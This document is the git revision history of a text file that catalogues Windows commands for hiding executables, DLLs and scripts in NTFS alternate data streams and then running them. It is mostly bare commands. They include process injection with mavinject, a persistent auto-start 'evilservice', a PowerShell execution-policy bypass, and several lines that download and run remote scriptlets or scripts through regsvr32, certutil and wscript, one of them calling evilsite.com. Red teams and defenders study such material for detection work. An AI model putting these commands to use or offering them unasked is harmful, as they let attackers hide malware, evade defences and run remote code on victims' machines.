wflk · January 16, 2020 06:43 · Jan 10, 2020 · Oct 10, 2019 · Oct 2, 2019 · Jun 27, 2019
diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -1,4 +1,4 @@
-#Add content to ADS
+###Add content to ADS###
 type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
 extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
 findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
@@ -13,7 +13,11 @@ powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\
 curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe
 cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct   ^scrobj.dll > fakefile.doc:reg32.bat
 
-#Executing the ADS content
+###Extract content from ADS###
+expand c:\ads\file.txt:test.exe c:\temp\evil.exe
+esentutl.exe /Y C:\temp\file.txt:test.exe /d c:\temp\evil.exe /o
+
+###Executing the ADS content###
 
 * WMIC
 wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -87,7 +87,11 @@ echo [internetshortcut] > fake.txt:test.txt && echo url=C:\windows\system32\calc
 rundll32.exe shdocvw.dll,OpenURL C:\temp\ads\fake.txt:test.txt
 https://github.com/sailay1996/misc-bin/blob/master/ads.md
 
-' bash.exe
+* bash.exe
 echo calc > fakefile.txt:payload.sh && bash < fakefile.txt:payload.sh
 bash.exe -c $(fakefile.txt:payload.sh)
 https://github.com/sailay1996/misc-bin/blob/master/ads.md
+
+* Regsvr32
+type c:\Windows\System32\scrobj.dll > Textfile.txt:LoveADS
+regsvr32 /s /u /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct Textfile.txt:LoveADS
diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -77,3 +77,17 @@ AppVLP.exe c:\windows\tracing\test.txt:ha.exe
 * Cmd.exe
 cmd.exe - < fakefile.doc:reg32.bat
 https://twitter.com/yeyint_mth/status/1143824979139579904
+
+* Ftp.exe
+ftp -s:fakefile.txt:aaaa.txt
+https://github.com/sailay1996/misc-bin/blob/master/ads.md
+
+* ieframe.dll , shdocvw.dll (ads)
+echo [internetshortcut] > fake.txt:test.txt && echo url=C:\windows\system32\calc.exe >> fake.txt:test.txt rundll32.exe ieframe.dll,OpenURL C:\temp\ads\fake.txt:test.txt
+rundll32.exe shdocvw.dll,OpenURL C:\temp\ads\fake.txt:test.txt
+https://github.com/sailay1996/misc-bin/blob/master/ads.md
+
+' bash.exe
+echo calc > fakefile.txt:payload.sh && bash < fakefile.txt:payload.sh
+bash.exe -c $(fakefile.txt:payload.sh)
+https://github.com/sailay1996/misc-bin/blob/master/ads.md
diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -28,6 +28,7 @@ cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"
 
 * Wscript
 wscript c:\ads\file.txt:script.vbs
+echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js
 
 * Forfiles
 forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe"
@@ -41,6 +42,7 @@ c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35
 
 * MSHTA
 mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"
+(Does not work on Windows 10 1903 and newer)
 
 * Control.exe
 control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -11,6 +11,7 @@ expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
 esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o
 powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"
 curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe
+cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct   ^scrobj.dll > fakefile.doc:reg32.bat
 
 #Executing the ADS content
 
@@ -70,3 +71,7 @@ bitsadmin /RESUME myfile
 
 * AppVLP.exe
 AppVLP.exe c:\windows\tracing\test.txt:ha.exe
+
+* Cmd.exe
+cmd.exe - < fakefile.doc:reg32.bat
+https://twitter.com/yeyint_mth/status/1143824979139579904
diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -10,6 +10,7 @@ regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
 expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
 esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o
 powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"
+curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe
 
 #Executing the ADS content
 

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -66,3 +66,6 @@ bitsadmin /create myfile
 bitsadmin /addfile myfile c:\windows\system32\notepad.exe c:\data\playfolder\notepad.exe
 bitsadmin /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL
 bitsadmin /RESUME myfile
+
+* AppVLP.exe
+AppVLP.exe c:\windows\tracing\test.txt:ha.exe
diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -55,6 +55,9 @@ powershell -ep bypass - < c:\temp:ttt
 * Powershell.exe
 powershell -command " & {(Get-Content C:\ADS\1.txt -Stream file.exe -Raw | Set-Content c:\ADS\file.exe) | start-process c:\ADS\file.exe}"
 
+* Powershell.exe
+Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = C:\ads\folder:file.exe}
+
 * Regedit.exe
 regedit c:\ads\file.txt:regfile.reg
 

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -18,6 +18,8 @@ wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfil
 
 * Rundll32
 rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain
+rundll32.exe advpack.dll,RegisterOCX not_a_dll.txt:test.dll
+rundll32.exe ieadvpack.dll,RegisterOCX not_a_dll.txt:test.dll
 
 * Cscript
 cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -22,6 +22,9 @@ rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll"
 * Cscript
 cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"
 
+* Wscript
+wscript c:\ads\file.txt:script.vbs
+
 * Forfiles
 forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe"
 

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -47,6 +47,9 @@ https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-
 * Powershell.exe
 powershell -ep bypass - < c:\temp:ttt
 
+* Powershell.exe
+powershell -command " & {(Get-Content C:\ADS\1.txt -Stream file.exe -Raw | Set-Content c:\ADS\file.exe) | start-process c:\ADS\file.exe}"
+
 * Regedit.exe
 regedit c:\ads\file.txt:regfile.reg
 

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -9,6 +9,7 @@ reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
 regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
 expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
 esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o
+powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"
 
 #Executing the ADS content
 

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -47,4 +47,10 @@ https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-
 powershell -ep bypass - < c:\temp:ttt
 
 * Regedit.exe
-regedit c:\ads\file.txt:regfile.reg
+regedit c:\ads\file.txt:regfile.reg
+
+* Bitsadmin.exe
+bitsadmin /create myfile
+bitsadmin /addfile myfile c:\windows\system32\notepad.exe c:\data\playfolder\notepad.exe
+bitsadmin /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL
+bitsadmin /RESUME myfile
diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -8,6 +8,7 @@ print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
 reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
 regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
 expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
+esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o
 
 #Executing the ADS content
 

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -7,6 +7,7 @@ makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
 print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
 reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
 regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
+expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
 
 #Executing the ADS content
 

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -6,6 +6,7 @@ certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/
 makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
 print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
 reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
+regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
 
 #Executing the ADS content
 

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -42,3 +42,6 @@ https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-
 
 * Powershell.exe
 powershell -ep bypass - < c:\temp:ttt
+
+* Regedit.exe
+regedit c:\ads\file.txt:regfile.reg
diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -5,6 +5,7 @@ findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.
 certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
 makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
 print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
+reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
 
 #Executing the ADS content
 

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -4,7 +4,7 @@ extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
 findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
 certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
 makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
-
+print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
 
 #Executing the ADS content
 

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -3,6 +3,7 @@ type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.
 extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
 findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
 certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
+makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
 
 
 #Executing the ADS content

diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -2,6 +2,7 @@
 type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
 extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
 findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
+certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
 
 
 #Executing the ADS content
@@ -35,4 +36,7 @@ https://twitter.com/bohops/status/954466315913310209
 * Create service and run
 sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
 sc start evilservice
-https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
+https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
+
+* Powershell.exe
+powershell -ep bypass - < c:\temp:ttt
diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -2,7 +2,8 @@
 type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
 extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
 findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
-
+
+
 #Executing the ADS content
 
 * WMIC
@@ -33,4 +34,5 @@ https://twitter.com/bohops/status/954466315913310209
 
 * Create service and run
 sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
-sc start evilservice
+sc start evilservice
+https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -1,6 +1,7 @@
 #Add content to ADS
 type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
-
+extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
+findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
 
 #Executing the ADS content
 
@@ -28,4 +29,8 @@ mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta
 
 * Control.exe
 control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll
-https://twitter.com/bohops/status/954466315913310209
+https://twitter.com/bohops/status/954466315913310209
+
+* Create service and run
+sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
+sc start evilservice
diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -26,3 +26,6 @@ c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35
 * MSHTA
 mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"
 
+* Control.exe
+control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll
+https://twitter.com/bohops/status/954466315913310209
diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -1,11 +1,15 @@
-#Embed file to ADS
+#Add content to ADS
 type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
-
-#Executing
+
+
+#Executing the ADS content
 
 * WMIC
 wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
 
+* Rundll32
+rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain
+
 * Cscript
 cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"
 
@@ -19,3 +23,6 @@ notepad.exe                   4172 31C5CE94259D4006           2     18,476 K
 type c:\temp\AtomicTest.dll > "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
 c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
 
+* MSHTA
+mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"
+
diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -2,7 +2,20 @@
 type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
 
 #Executing
+
+* WMIC
 wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
+
+* Cscript
 cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"
 
-forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe"
+* Forfiles
+forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe"
+
+* Mavinject.exe
+c:\windows\SysWOW64\notepad.exe
+tasklist | findstr notepad
+notepad.exe                   4172 31C5CE94259D4006           2     18,476 K
+type c:\temp\AtomicTest.dll > "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
+c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
+
diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -5,3 +5,4 @@ type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.
 wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
 cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"
 
+forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe"
diff --git a/Exe_ADS_Methods.txt b/Exe_ADS_Methods.txt
@@ -0,0 +1,7 @@
+#Embed file to ADS
+type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
+
+#Executing
+wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
+cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"
+
No results found